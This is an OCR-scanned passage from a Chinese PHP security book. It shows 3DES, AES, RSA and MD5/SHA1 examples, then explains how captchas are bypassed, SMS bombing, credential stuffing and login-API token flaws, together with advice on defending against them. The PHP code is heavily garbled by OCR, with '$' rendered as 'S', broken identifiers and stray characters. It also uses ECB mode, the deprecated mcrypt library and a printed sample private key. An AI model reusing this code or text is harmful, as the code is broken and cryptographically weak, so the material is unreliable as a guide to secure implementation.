10.1 对 称 加 密 


对 称 加 密 指 的 是 采用 单 密 钥 进行 加 密 ， 并 且 该 密 钥 可 以 对 数据 进行 加 密 和 解密 处 理 ， 目 前 这 类 加 密 算法 安全 性 均 比 较 高 ， 数 据 的 实际 安全 性 取决 于 密 钥 的 管理 ， 就 算 黑客 拿 到 加 密 后 的 数据 ， 如 果 没有 
密 钥 ， 这 些 数 据 对 于 黑客 来 说 也 是 垃圾 数据 而 已 ， 而 拿 到 密 钥 之 后 可 以 对 加 密 数 据 进 行 还 原 ， 所 以 笔者 不 建议 使 用 对 称 加 密 对 用 户 密 码 进 行 加 密 存储 。 它 的 原理 比较 简单 ， 如 图 10-1 所 示 。 


9] 
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图 10-1 
明文 数据 123456 可 以 在 加 密 算法 的 作用 下 使 用 密 钥 0s9ansk2 处 理 后 变 成 d2fm83jjf， 同 样 使 用 这 个 密 钥 也 能 把 d2fm83jjf 解 密 回 123456。 


在 对 称 加 密 算法 中 常用 的 算法 有 DES、3DES、TDEA、Blowfish、RC2、RC4、RC5、IDEA、SKIPJACK、AES 等 。 


10.1.1 ”3DES 加 密 


DES (Data Encrypt Standard) 又 称 Triple DES， 是 DES 加 密 算法 的 一 种 模式 ， 它 使 用 3 条 56 位 的 密 钥 对 数据 进行 三 次 加 密 。DES 加 密 算法 是 美国 的 一 种 由 来 已 久 的 加 密 标准 ， 这 种 算法 通常 用 于 加 密 
需要 传输 的 数据 。 


PHP 中 需要 在 php.ini 中 打开 php_mcrypt.dll 以 及 php_mcrypt filter.dll 两 个 lib 库 的 引用 ， 即 去 掉 以 下 代码 前 面 的 分 号 





; extension-php mcrypt.dll; extension-php mcrypt filter.dll 


PHP 的 3DES 已 经 有 很 简洁 成 熟 的 加 密 ， 我 们 来 看 一 个 简单 的 3DEs 加 解密 类 ， 代 码 如 下 : 


«? php 
class Crypt3Des { 
public $key = "xxxx"; //jJm E554 
function Crypt3Des ($key) { 
Sthis-»key-$key; 


} 
/ | Jo EE By XC 
function encrypt ($input) { 
$size = mcrypt get block size (MCRYPT 3DES, 'ecb') ; 








$input = $this-»pkcs5 pad ($input, $size) ; 
$key = str pad (Sthis->key, 24, '0') ; 
Std = mcrypt module open (MCRYPT . 3DES, mr. UD R Tt 





Siv = G(mcrypt create iv (mcrypt enc get iv size (Std) , MCRYPT RAND) ; 
Gmcrypt generic init ($td, $key, S$iv) ; 

$data = mcrypt generic ($td, $input) ; 

mcrypt generic deinit (Std) ; 

mcrypt module close (Std) ; 

$data = base64 encode ($data) ; 

return $data; 


} 

// 解 密 函 数 

function decrypt (Sencrypted) { 
Sencrypted = base64 decode (Sencrypted) ; 
$key = str pad (Sthis->key, 24, '0') ; 


























Std = mcrypt module open (MCRYPT 3DES, '', 'ecb', '') ; 
$iv = Gmcrypt create iv (mcrypt enc get iv size (Std) , MCRYPT RAND) ; 
$ks = mcrypt enc get key size (Std) ; 











Qmcrypt generic init (Std, $key, Siv) ; 
$decrypted = mdecrypt generic ($td, S$encrypted) ; 
mcrypt generic deinit ($td) ; 

mcrypt module close ($td) ; 

$y-Sthis-»pkcs5 unpad (Sdecrypted) ; 

return $y; 








} 

function pkcs5 pad ($text, Sblocksize) { 
Spad = Sblocksize - (strlen ($text) % S$blocksize) ; 
return $text . str repeat (chr (Spad) , $pad) ; 








} 
function pkcs5 unpad ($text) { 
Spad = ord ($text{strlen ($text) -1]) ; 
if (Spad > strlen ($text) ) { 
return false; 

















} 
if (strspn ($text, chr ($pad) , strlen ($text) - $pad) ! = Spad) { 
return false; 








} 





return substr ($text, 0, -1 * Spad) ; 
} 
function PaddingPKCS7 ($data) (| 
Sblock size = mcrypt get block size (MCRYPT 3DES, MCRYPT MODE CBC) ; 
$padding char = $block size - (strlen ($data) % $block size) ; 
$data .= str repeat (chr ($padding char) , Spadding char) ; 
return $data; 


} 
}2 > 

















使 用 方法 很 简单 ， 只 要 实例 化 这 个 类 ， 直 接 调 用 相应 函数 即 可 ， 如 下 所 示 : 





Srep=new Crypt3Des (' 加 窗 key') ; 

Sinput="hello 3des"; 

echo "Jax: ".Sinput."<br/>"; 

Sencrypt card-$rep-»encrypt ($input) ; 

echo "Js€: ".$encrypt card."«br/»"; 

echo "解密 : ".Srep-»decrypt ($rep-»encrypt ($input) ) ; 





我 们 来 看 看 经 过 它 处 理 后 的 数据 ， 如 图 10-2 所 示 。 


ED 
Load URL — http://127.0.0.1/test/1.php 


Split URL 


Execute 
Enable Post data 
hello world 
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图 10-2 


10.1.2 AESJDS 


AES (Advanced Encryption Standard) 加 密 在 密码 学 中 又 称 Rijjndael 加 密 法 ， 比 3DES 更 加 安全 ， 密 钥 长 度 的 最 少 支持 为 128、192、256 人 位， 所 以 逐渐 替代 原先 的 DES。 


PHP 中 需要 在 php.ini 中 打开 php_mcrypt.dll 库 的 引用 ， 设 置 方法 我 们 已 在 上 一 小 节 介绍 过 ， 我 们 来 看 一 个 PHP 中 AES 的 加 解密 实例 : 


«? php 


class Aes{ 
public $ secrect key-''; // %4 
function Aes ($key) ( 
$this-» secrect key = Skey; 





} 
/** 
* 加 密 方 法 
* (param string Sstr 
* (return string 
xf 
function encrypt ($str) ( 

//AES, 128 ECB 模 式 加 密 数 据 

$screct key = $this-> secrect key; 

$screct key = base64 decode ($screct key) ; 

Sstr = trim ($str) ; 

Sstr = Sthis-»addPKCS7Padding ($str) ; 

$iv = mcrypt create iv (mcrypt get iv size (MCRYPT RIJNDAEL 128, MCRYPT MODE ECB) , MCRYPT RAND) ; 
Sencrypt str = mcrypt encrypt (MCRYPT RIJNDAEL 128, Sscrect key, $str, MCRYPT MODE ECB, Siv) ; 
return base64 encode (Sencrypt str) ; | = i Bü i 
















































































} 

/** 

* 解密 方法 

* (iparam string Sstr 

* @return string 

Ayr 

function decrypt ($str) ( 
//AES, 128 ECB 模 式 加 密 数 据 
$screct key = $this-> secrect key; 

$str = base64 decode ($str) ; 

$screct key = base64 decode ($screct key) ; 

$iv = mcrypt create iv (mcrypt get iv size (MCRYPT RIJNDAEL 128, MCRYPT MODE ECB) , MCRYPT RAND) ; 






































Sencrypt str = mcrypt decrypt (MCRYPT RIJNDAEL 128, $screct key, $str, MCRYPT MODE ECB, $iv) ; 
Sencrypt str = trim (Sencrypt str) ; 

Sencrypt str = $this-»stripPKSC7Padding (Sencrypt str) ; 

return Sencrypt_str; i 






































} 
/** 
* 填充 算法 
* (iparam string Ssource 
* @return string 
2 
function addPKCS7Padding ($source) { 
$source - trim ($source) ; 
Sblock = mcrypt get block size ('rijndael-128', '‘ecb') ; 
Spad = Sblock - (strlen ($source) % S$block) ; 
if (Spad <= $block) { 
Schar = chr ($pad) ; 
$source .= str repeat (Schar, Spad) ; 








} 
return Ssource; 
"at 
* 移 去 填充 算法 
* @param string Ssource 
* (return string 
*/ 
function stripPKSC7Padding ($source) { 
$source = trim ($source) ; 
Schar = substr ($source, -1) ; 
Snum = ord (Schar) ; 
if (Snum==62) return $source; 
Ssource = substr ($source, 0, -$num) ; 
return Ssource; 














这 个 加 密 类 使 用 起 来 也 相当 简单 : 





Srep=new Aes ('xxxx') ; 

Sinput="hello aes"; 

echo "Rx: ".Sinput."«br/»"; 

Sencrypt card-$rep-»encrypt ($input) ; 

echo "JÆ: ".$encrypt card."«br/»"; 

echo "解密 : ".Srep-»decrypt ($rep-»encrypt ($input) ) ; 





我 们 来 看 看 使 用 它 加 解密 后 的 效果 ， 如 图 10-3 所 示 。 


= @ SQL- XSS- Encryption- Encoding- Other- 
Load URL http://127.0.0.1/test/1.php 
Split URL 
Execute 
Enable Post data Enable Referrer 


3x: hello aes 
JI: wZulxlyIHhgikrftH40evQ— 
Bras. hello acs 





图 10-3 


10.2” 非 对 称 加 密 


非 对 称 加 密 与 对 称 加 密 不 一 样 的 地 方 在 于 ， 非 对 称 加 密 算法 有 两 个 密 钥 ， 分 别 为 公 钥 和 私 钥 ， 它 的 安全 性 比 对 称 加 密 更 好 ， 公 钥 用 来 加 密 ， 私 钥 用 来 解密 ， 如 果 用 公 钥 对 数据 进行 加 密 ， 只 有 用 对 应 的 


私 钥 才能 解密 ， 两 个 密 钥 不 一 致 ， 所 以 叫 非 对 称 加 密 。 


它 的 使 用 流程 原理 如 图 10-4 所 示 。 


明文 
123456 密 文 123456 
Os9ansk? 


图 10-4 





RSA 加 密 
德 曼 (Leonard Adleman) 一 起 提出 ，RSA 正 是 他 们 三 人 的 姓氏 开头 字母 拼接 。RSA 是 目前 公 


DIE 


RSA 公 钥 加 密 算法 在 1977 年 由 罗 纳 德 .李维斯 特 (Ron Rivest) 、 阿 迪 . 萨 莫 尔 (Adi Shamir) 和 伦 纳 德 - 阿 
认 最 有 影响 力 的 加 密 算法 ， 不 过 并 不 是 不 可 破解 的 ， 在 短 密 钥 的 情况 下 ， 基 于 现在 越 来 越 强 大 的 去 计算， 也 存在 被 爆破 的 可 能 。 早 在 1999 年 ， 就 有 花 了 五 个 月 时 间 在 一 人 台 有 3.2G 中 央 内 存 的 Cray C916 计 算 


机 上 成 功 分 解 RSA-155 (512 位 ) 。 
RSA 的 最 大 问题 在 于 加 解密 速度 慢 ， 整 个 运算 过 程 相对 要 消耗 不 少时 间 ， 不 过 这 一 些 问 题 在 今后 计算 资源 横向 扩展 的 条 件 下 ， 也 不 是 很 大 的 问题 。 
我 们 来 测试 一 下 PHP 下 的 RSA 加 解密 ， 如 果 希 望 简单 一 点 ，PHP 上 可 以 使 用 phpseclib， 下 载 地 址 http://phpseclib.sourceforge.net/， 不 需要 配置 即 可 直接 使 用 ， 首 先 下 载 phpseclib， 文 件 结构 如 图 


10-5 所 示 。 


a System 
| | openssl.cnf 





然后 生成 密 铀 ， 代 码 如 下 : 


«? php 

include ('./Crypt/RSA.php') ; 

$rsa = new Crypt RSA () ; 

extract ($rsa-»createKey () ) ; 
echo "$privatekey«br />Spublickey"; 


生成 密 钥 后 ， 我 们 来 看 看 加 解密 代码 : 


«? php 

SPUBLIC KEY z'----- BEGIN PUBLIC KEY----- 

M] [GÉMA0GCSqGS b3DOQEBAQUAAAGNADCBiQKBgQCm418GwRwXmYOC6eb6G6NzCMRt 
nan7Jt76kygfmfa2mGRulFf8t3bjyrrRPra8LOgcGxOlKZkDPxODsfX2fblXCNCz 
EXxYerZ] ge 0 
m+GpAAH94H1crvcbSwIDAQAB 
-----END PUBLIC KEY-----'; 

SPRIVATE KEY = '----- BEG N RSA PRIVATE KEY----- 
MIICXAIBAAKBgQCm418GwRwXmYOC6eb6G6NzCMRtnan7Jt76kygfmfa2mGRulFf8 
t3bjyrrRPra8LQgcGxOlKZkDPxODsfX2fblXCNCzEXxYerZIrcQXRA4utTMXkQCN7 
E7egNDlQOqrPÜawFZ5OWrYcbDdmgxa2jAEGCR3FamtGpAAH94HlcrvcbSwIDAQAB 
AoGBAKYm-RTgbfeQ/z33Yd7gZXrB387Cidlied0/ZVMREm/0iQlOn8sbXWKtFBH/ 
Pi9bJhfVXWmgYJa6ldLn-ttnNkhdYsWCHxN3eMlLJ8XuQj vmrofWb1yZtWVblGhbd 
O9fSX2RH8m7DOxrV85/oPOqYTKfla8R21hKmdgo9JDegMRUBAkEA2ZLqpnqXJ2qp 
FE3OHnQydnJQllAG711egYheQhOUmel8CVrWjv40sK5clQK6kONj9JscDOZPdCqq 
EVQb5dSWtOJBAMRcCOhzEVpgo5441SIZV1sMiWwxVhDLpvuEUJZtSLh52FTItO07Rt7 
mVVOIExq722bDXlyhHiqYPen7ckO0GCORKf8CQCTp3zPVkrWWTA9sz-6syi78YB3Q 
gAyK/NC/QTa4VHuuPX9cORA70tb; DkOdzWdtnPTOKCeTROGVR2F fQshwlAOCQGCZ 
ZWALkxI-JVQ/sUMtHX9X--n TB6Uxmw9nU4H9d2YRwOMCeoDsB/ jgU7gLKI-WCLwvE 
971pERUlDwOJzM7zjh8CQEz541lyxg7sttBtEV2RZOd-*8bMBaRJWXYqN8 6vn+dsSjq 
ds4vY6KgES i a a 

-----END RSA PRIVATE KEY----- 5 

include ('Crypt/RSA. Es 7 

$rsa = new Crypt RSA () ; 

$rsa-»loadKey (SPUBLIC KEY) ; // RADA 

Splaintext = 'phpsec'; 

Srsa->setEncrypt tionMode (CRYPT RSA ENCRYPTION PKCS1) ; 
Sciphertext = $rsa-»encrypt ($plaintext) ; 

$rsa-»loadKey (SPRIVATE KEY) ; // RAFAJ 

echo $ciphertext.' «br /5','«br /»'.'«br />'; 

echo $rsa-»decrypt ($ciphertext) ; 

















































































































































































































































































































































































































































































































可 以 看 到 $rsa->encrypt ($plaintext) ; 函数 用 来 加 密 ， 最 终 用 $rsa->decrypt ($ciphertext) 来 解密 并 输出 明文 字符 串 “phpsec” ， 效 果 如 图 10-6 所 示 。 


| & ) @ 127.0.0.1/test/phpseclib/1.php 


eft Hl] BE GI KAS eRe Là l"gSÉmam4€ oii vite ^3B22V/38) 22:58 oC 9 3; 


phpsec 





图 10-6 


第 一 行 的 乱码 就 是 加 密 后 的 “phpsec” ， 通 常 保存 的 时 候 还 会 用 Base64 转 码 一 下 才 好 。 


10.3 Rp 


之 前 我 们 介绍 的 加 密 算法 都 是 双向 的 ， 也 就 是 加 密 后 可 以 再 逆向 算出 明文 数据 ， 而 在 加 密 算法 里 面 ， 还 有 单 向 加 密 ， 也 就 是 不 可 逆 算 法 ， 常 见 的 有 MD 系列 (md4 md5) 和 sha1 等 。 因 为 存在 不 可 逆 
的 性 质 ， 所 以 这 类 哈 希 算法 通常 用 来 保存 密码 和 做 数字 签名 ， 不 过 因为 相同 的 字符 串 的 哈 希 值 是 一 样 的 ， 所 以 存在 碰撞 的 问题 ， 目 前 全 球 公 开 的 最 大 MD5 解 密 库 cmd5.com 号 称 有 24 万 亿 条 数据 ， 解 密 率 全 
球 第 一 ， 笔 者 在 实际 应 用 中 也 感受 到 普通 人 常用 的 密码 破解 成 功率 也 在 90% 以 上 。 


MD5/sha1 加 密 


MD5 是 目前 使 用 最 多 的 密码 存储 加 密 算法 ， 几 乎 95% 以 上 的 网 站 都 在 使 用 MD5 算 法 ，MD5 分 为 16 位 和 32 位 ， 实 际 上 它们 的 安全 性 并 没有 什么 不 一 样 的 地 方 。 根 据 实际 经 验 来 看 ， 用 单纯 MD5 (不 加 
salt) 来 存储 用 户 密码 是 非常 不 安全 的 ， 提 供 MD5 解 密 的 网 站 随处 可 见 ， 如 cmd5.com、xmd5.com， 等 等 。 


在 PHP 中 进行 MD5 计 算 很 简单 ，PHP 提 供 了 md5 () 函数 ， 只 要 传 入 一 个 字符 串 即 可 返回 加 密 后 的 结果 。 


同样 ，sha1 加 密 也 被 部 分 网 站 用 来 保存 密码 ， 它 比 MD5 更 长 ， 足 足 有 40 位 ， 支 持 sha1 解 密 的 网 站 相对 较 少 ， 碰 撞 的 数据 量 也 相对 较 少 ， 所 以 实际 中 它 的 “安全 性 ” 比 MD5 更 好 。 我 们 来 看 看 它 的 使 用 
方法 ， 代 码 如 下 : 


«? php 

echo 'phpsec md5: '.md5 ('phpsec') ; 
echo '«br /»'; 

echo 'phpsec shal: '.shal ('phpsec') ; 


执行 结果 如 图 10-7 所 示 。 


z| = @ SQL- XSS- Encryption- Encoding» Other- 


Load URL — http;//127.0.0.1/test/1.php 


Split URL 
Execute 
[^] Enable Post data Enable Referrer 


phpsec md5: d5253e6dc4c3e8db452ae18360d961d3 
phpsec shal: 1c2cc0407216a978b50101&b0b74a90be0deO0cdd 





图 10-7 


第 11 章 ”业务 功能 安全 设计 
要 打造 安全 的 应 用 程序 ， 要 从 业务 功能 的 设计 开始 ， 只 有 功能 设计 得 足够 安全 ， 编 写 代码 的 时 候 才 会 少 出 现 一 些 漏洞 ， 特 别 是 之 辑 漏洞 。 所 以 设计 一 个 安全 功能 尤为 重要 。 下 面 我 们 将 对 功能 安全 的 辣 


进行 分 析 ， 这 些 功能 包括 验证 码 、 用 户 登 录 、 用 户 注 册 、 密 码 找 回 、 资 料 操 作 、 投 票 、 积 分 、 抽 奖 、 充 值 支付 、 私 信友 馈 、 文 件 管理 、 数 据 库 管理 以 及 命令 执行 等 ， 对 经 常 出 现 的 漏洞 以 及 利用 方式 进行 
详细 的 分 析 ， 表 给 出 详细 的 安全 设计 应 该 注意 的 地 方 。 这 一 部 分 内 容 对 于 项 目 设 计 人 员 和 研发 人 员 来 说 更 有 价值 。 


11.1 验证 人 码 


验证 码 可 以 解决 很 多 业务 安全 问题 ， 比 如 撞 库 、 垃 圾 注册 ， 等 等 ， 可 谓 防御 业务 风险 必 备 神器 。 验 证 码 有 图 片 验证 码 、 滑 动 验证 码 、 短 信 / 邮 箱 / 电 话 、 二 维 码 等 分 类 ， 而 据 保守 估计 起 码 有 80% 以 上 的 
验证 码 是 存在 可 以 爆破 和 简单 识别 的 问题 ， 设 计 一 个 有 效 的 验证 码 尤为 重要 。 


11.1.1 “验证 码 绕 过 


图 片 验证 码 是 目前 见得 比较 多 的 ， 各 种 各 样 的 图 片 验证 码 形式 也 比较 多 和 奇 葛 ， 有 中 文 、 英 文 、 字 母 数字 和 看 图 识 物 ， 等 等 ， 简 单列 举 一 下 ， 如 图 11-1~ 图 11-3 所 示 。 














ET 
2k 








忘记 登录 密码 ? — 





e use Meum 





验证 于 机 


O 核验 码 已 发 着 到 你 的 手机 ，15 分 钟 内 输 闵 有效 ， 请 幼 测 漏 


手机 号 码 186532599409 


ROR 58H) i 


O 核验 码 已 发 送 至 你 的 手机 ;请 查收 





输入 你 看 到 的 字符 


aw aaa eee 


图 11-3 





不 得 不 吐槽 一 下 ， 一 些 验 证 码 为 了 避免 机 器 识别 ， 已 经 被 逼 得 设计 成 人 类 都 认 不 出 来 了 ， 业 务 和 体验 设计 与 安全 是 有 一 点 矛 与 盾 的 ， 所 以 从 业务 角度 考虑 ， 我 们 还 是 能 找到 很 多 绕 过 这 些 验证 码 的 方 
法 ， 我 们 来 一 起 看 看 。 


1. 不 刷新 直接 绕 过 


Web 页 面 登录 等 操作 的 验证 码 能 够 多 次 使 用 的 原因 是 后 端 程序 在 接收 一 次 请 求 后 ， 并 没有 主动 刷新 验证 码 ， 部 分 比较 大 的 业务 使 用 了 负载 均衡 ， 验 证 码 跟 3ession 绑 定 在 一 起 ， 为 了 能 够 保证 验证 码 能 
够 正常 使 用 ， 所 以 会 把 验证 码 明文 或 者 加 密 后 放 在 Cookie 或 者 POST 数据 包 里 面 ， 所 以 每 次 只 要 同一 个 数据 包 里 面 的 两 个 验证 码 对 上 了 即 可 绕 过 。 


2. 暴 力 破解 
注册 或 者 找 回 密码 等 敏感 操作 时 的 手机 或 者 邮箱 验证 码 能 够 爆破 ， 主 要 是 因为 程序 没有 设置 验证 码 错 误 次 数 和 超时 ， 导 致 能 够 不 断 进 行 尝 试 。 
3. 机 器 识别 


机 器 识别 验证 码 对 于 不 同 的 验证 码 类 型 有 不 同 的 手段 ， 最 常见 的 是 图 片 验 证 码 的 机 器 识别 ， 这 类 识别 有 两 种 情况 : 一 种 是 针对 不 是 实时 生成 的 验证 码 ， 已 经 生成 了 部 分 的 验证 码 在 服务 器 端 保存 ， 前 端 
直接 加 载 验证 。 这 类 是 最 好 绕 过 的 ， 只 要 把 全 部 的 验证 码 文件 保存 回来 ， 做 一 个 图 片 MD5 库 ， 然 后 利用 的 时 候 直接 匹配 服务 器 端 返回 的 图 片 MD5 即 可 识别 。 另 外 一 种 是 动态 生成 的 验证 码 ， 这 类 需要 做 一 些 
图 片 文字 识别 或 者 语音 识别 ， 当 初 有 一 个 笑话 讲 的 是 Google 出 的 语音 识别 系统 干掉 了 自家 的 语言 验证 码 。 国 内 也 有 专门 提供 这 种 服务 的 公司 ， 比 如 云 速 ， 如 图 11-4 所 示 。 


4. 打 人 码 平台 


这 类 打 码 平台 大 多 数 后 端 是 使 用 廉价 的 人 工资 源 在 打 ， 比 如 学 生 什么 的 ， 国 内 比较 有 名 的 像 打 码 免 (damatu1.com) 、Q 赚 (qqearn.com) ， 等 等 ， 让 我 们 来 看 一 个 任务 佣金 表 就 知道 成 本 有 多 低 ， 
如 图 11-5 所 示 。 


经 过 上 面 的 分 析 ， 我 们 大 致 可 以 知道 号 样 设计 一 个 强壮 的 验证 码 ， 主 要 有 以 下 几 点 : 


1) 最 重要 的 是 ， 要 设置 验证 码 错误 次 数 ， 比 如 一 个 验证 码 只 能 错误 一 次 ， 这 就 避免 了 暴力 破解 的 问题 。 


2) 不 把 验证 码 放 到 HTML 页 面 或 者 Cookie 中 。 


3) 验证 码 要 设置 只 能 请 求 一 次 ， 请 求 一 次 后 不 管 错误 与 否 都 在 后 端 程序 强制 刷新 。 


”请 点击 你 需要 的 快捷 目录 来 选择 验证 类 型 

| 工 纯 数字 | 25r | 3B ERA 

| 4 纯 汉 字 ”5 数字 英文 汉字 三 混合 | 了 算术 题 | 点 击 查看 案例 ) 
| 9 自 走 义 儿 (联系 去 服 ) | | 


我 们 平台 可 以 识别 所 有 类 型 的 验证 码 ，N 位 英 误 ，N 位 汉字 ， 讨 算 ， 坐 标 等 ， 下 面 的 表 里 面 不 一定 列 出 来 了 ， 如 果 雪 里 面 没有 ,您 可 以 联系 我 们 的 
BONIS SESSRIES |! 

点 数 换算 : 100,000sz:£&- 507p EERTAGzZE HR, 1S (SESKEEU HR A 381) - 5[8 - 105823. 

10000522 —57r 

AB] ( 23 时 -8 时 ) DRAA ODA SiimA TBSLZE v ACA 10582X ZIBIEAJIZ ae. 


EXER pedi eed til 
任意 长 度数 字 § sss | 每 一 位 3 点 数 会 降低 识别 率 轻 易 不 要 选 泽 这 个 类 型 

vce: MN 102585 | 12:2; | | 

MUSENE | 10 点 数 | 125 

ree S | 102225 | 12: 

o | 10258 | 12255 

See MN 122388 | 144584 

TU NN 15288 | 1853 

Tee | 17 点 数 | 20.4 点 数 

d c NN 20 点 数 | ?4 点 数 

JC - MM 22588 | 26.4524 
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游戏 网 赚 手机 赚钱 + AS 支付 数据 QR ie zs 


HEGERE NET Framework 20 FHSS) 


结算 状态 / 阴 细 [angi MEHKE 


07H24B Tees 70,140,137; 点 此 参与 


07 月 21 日 工资 已 友 9.345. 717r nites 


OFA208 Lees 588.2256 mines 


07A246 Teese 132.6570 role E; 


07H24H Tees 22,553 127r. 


07 月 24 日 工资 已 发 106,015.207r 


07H24H T 41, 897.0271 


07H24B Tees 6,347.937r 





图 11-5 
4) WERA BESSER Ze of LA Ee RHUSCEEEG, Baa meee T UL, POOR ASCs, IITs. Bema. 
5) 验证 码 要 动态 生成 ， 不 能 统一 生成 多 次 调用 。 
11.1.2 ”验证 码 资源 小 


除了 验证 码 识别 外 ， 验 证 码 还 存在 一 个 大 问题 就 是 资源 滥用 。 相 信 大 家 应 该 对 短信 丢 炸 或 者 邮箱 龙 炸 比较 了 解 ， 被 龙 炸 的 手机 号 会 在 短 时 间 内 收 到 大 量 短信 ， 从 而 造成 受害 者 手机 一 直 响 ， 也 无 法 愉快 
地 看 短信 ， 工 具 如 图 11-6 所 示 。 
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图 11-7 





从 这 些 短 信 内 容 里 面 可 以 看 到 ， 这 类 工具 是 利用 了 大 量 网 站 的 短信 验证 码 接口 ， 而 这 些 接口 没有 限制 获取 验证 码 次 数 和 时 间 间 隔 ， 导 致 了 可 以 不 断 被 调用 ， 防 护 起 来 比较 简单 ， 只 要 注意 限制 单个 手机 
号 在 一 个 时 间 段 内 请 求 接收 短信 的 次 数 ， 另 外 就 是 限制 某 个 IP 在 一 个 时 间 段 内 请 求 接收 短信 的 次 数 ， 这 是 为 了 防止 提交 大 量 手 机 号 ， 消 耗 短信 资源 。 


11.2 ”用户 登录 


用 户 登 录 是 最 常见 的 一 个 功能 ， 登 录 就 意味 着 权限 授予 ， 如 果 攻 击 者 能 任意 登录 管理 员 的 账号 ， 也 就 拥有 了 管理 员 的 权限 ， 更 多 的 访问 权限 就 能 带 来 更 多 的 安全 问题 ， 所 以 在 登录 的 安全 尤为 重要 。 通 


11.2.1 fee ipa 


撞 库 漏洞 是 指 登录 口 没有 做 登录 次 数 限制 ， 导 致 可 以 使 用 不 同 的 用 户 及 密码 进行 不 断 的 登录 尝试 ， 以 遍历 用 户 密码 ， 也 可 以 理解 为 登录 爆破 ， 如 图 11-8 所 示 。 


Intruder attack 1 


Attack Save Columns 


ZDEDebuggerPresent- php,phtml,php3: 

spread fz39563A29634A967B$s96344963A962 2frori92?62 29638 $9634 10963,A9622ref963Aha0123962 2963B 596349963962 2timestamp 9622 
903 8/963. A1436955083 938 967 D: 
CNZZDATA12548384102497034257-1436954698-http96253A96252F 9625 2Fwww.hao123.com96252F967C 1436954698: 
-ga-GA1.2.1326721051.1436955031; Hm ivt 7a/ce48005cab6662971a010bfecf8309-1436955031,1436955038,1436955084; 
Hm lpvt 7a7ce48005ca6662971a010bfecf9309- 1436955084 

Connection: close 


phonez13556253252&phone, flag z 86&passwordz 22558B&auto, loginz false 





撞 库 漏洞 有 以 下 几 种 情况 : 
1) 用 户 名 和 密码 错误 次 数 都 无 限制 。 这 种 情况 是 早期 比较 常见 的 ， 可 以 载 入 用 户 名 和 密码 字典 对 登录 口 不 断 进行 请 求 党 试 。 


2) 单 时 间 段 内 用 户 的 密码 错误 次 数 限制 。 之 前 有 个 “ 锁 QQ” 的 荐 儿 ， 说 的 是 QQ 登录 密码 连续 错误 次 数 30 次 ， 就 会 被 锁定 QQ， 就 有 人 利用 这 个 问题 不 断 地 去 锁定 别人 的 QQ。 这 种 方式 是 基于 账号 可 
言 认 证 ， 密 码 错 误 次 数 存 在 限制 ， 认 证 的 是 账号 。 所 以 这 种 情况 也 是 可 以 撞 库 的 ， 只 要 我 们 有 一 个 用 户 名 列表 ， 爆 破 完 一 个 密码 还 不 能 登录 就 换 一 个 用 户 ， 或 者 干脆 基于 社工 库 的 密码 来 撞 。 


3) 单 时 间 段 内 IP 登 录 错 误 次 数 限制 。 比 较 典 型 的 是 discuz， 就 是 基于 IP 来 限制 登录 ， 当 一 个 IP 登 录 5 次 后 还 没有 成 功 登录 ， 则 会 被 禁止 该 I1P 登 录 ， 不 过 discuz 获 取 的 是 Client-IP 存 在 绕 过 的 问题 。 这 种 
防御 撞 库 的 手段 存在 一 个 误杀 的 问题 ， 如 果 出 口 IP 里 面 还 有 一 个 大 内 网 ， 比 如 企业 网 、 学 校 网 ， 这 时 候 束 会 误杀 其 他 用 户 。 


针对 撞 库 漏洞 比较 好 的 解决 方案 是 使 用 登录 验证 码 和 多 因素 认证 ， 登 录 验 证 码 有 很 多 种 ， 选 择 安全 的 验证 方式 也 很 关键 ， 因 为 目前 网 络 上 还 有 专门 提供 人 工 打 码 的 服务 平台 。 
11.2.2 ”API 登录 


2014 年 淘宝 被 曝光 一 个 影响 非常 大 的 逻辑 登录 漏洞 ， 漏 洞 发 现 者 在 乌云 报告 该 漏洞 后 获得 阿里 5 万 元 现金 的 奖励 ， 随 后 阿里 宣布 拿 出 ?500 万 人 民 币 建立 漏洞 屋 赏 计划 。 这 个 漏洞 跟 很 多 客户 端 AP 登录 的 
形式 差不多 ， 相 信 大 家 都 有 在 QQ 客户 端点 击 邮箱 或 者 QQ 空间 的 图 标 就 直接 免 登录 进入 的 经 历 ， 其 实在 后 端 也 有 一 个 验证 登录 过 程 。 来 看 看 淘宝 当时 的 漏洞 URL: 


https: //login.taobao.com/member/login by safe.htm? sub-&guf-&c is scure-&fromctbTop&type-l&style-default&minipara-&css style-&tpl redirect url-&popid-&callback-jsonp81&is igno: 





已 经 验证 登录 成 功 后 会 跳 转 到 这 个 链接 ， 这 个 链接 里 面 有 一 个 user_ num_iduser_num_id 参 数 ， 代 表 当 前 登录 的 用 户 ID， 请 求 这 个 链接 后 服务 器 端 会 返回 这 个 用 户 登录 成 功 后 的 Cookie 信 息 ， 这 里 的 问 
题 就 在 于 将 用 户 ID 交 给 这 个 程序 逻辑 的 时 候 ， 并 没有 带 上 唯一 的 一 个 Token， 这 就 导致 只 要 修改 user_num _iduser_num _id 这 个 参数 即 可 登录 任意 用 户 。 同 样 ，QQ 客 户 端 点 击 图 标 进入 QQ 空间 的 时 候 我 们 
可 以 看 到 这 样 一 个 链接 : 





http: //ptlogin2.qq.com/igame? clientuin=123456&clientkey=DC81BF8E5DC1DA7918DCA17A78FDF236DD6E41C09432B1DF5694F66B04C18DF54 





























其 中 clientuin 参 数 为 QQ 号 码 ，clientkey 参 数 为 当前 用 户 登 录 的 key， 只 要 拿 到 这 个 clientkey 则 可 以 登录 当前 QQ 号 ， 对 于 这 样 的 登录 方式 需要 注意 以 下 几 个 安全 点 : 
1) 登录 密 钥 (clientkey) 需要 不 可 预测 并 且 不 固定 ， 生 成 key 的 算法 中 加 入 随机 字符 。 
2) API 接 口 禁止 搜索 引擎 收录 。 


3) 登录 密 钥 当 次 绑 定 当前 主机 ， 换 机 器 不 可 用 ， 防 止 QQ 木马 和 嗅 探 Key。 


11.3 用户 注册 


淘宝 有 专门 的 风 控 团队 ， 垃 圾 注册 一 直 是 比较 头疼 的 问题 ， 目 前 像 贴 吧 、 论 坛 、 微 博 以 及 大 部 分 的 娱乐 应 用 都 有 一 些 评论 和 投票 功能 ， 通 过 这 些 功能 可 以 传播 广告 或 者 刷 排名 ， 于 是 就 出 现 了 商业 机 
会 ， 一 些 人 开始 写 自 动 化 注册 机 去 发 广告 ， 导 致 社区 质量 下 降 ， 大 部 分 的 网 站 都 是 需要 登录 才能 使 用 这 些 功能 的 ， 而 登录 的 前 提 是 有 账号 ， 所 以 注册 账号 这 块 拦截 掉 注 册 机 是 最 好 的 防御 点 。 


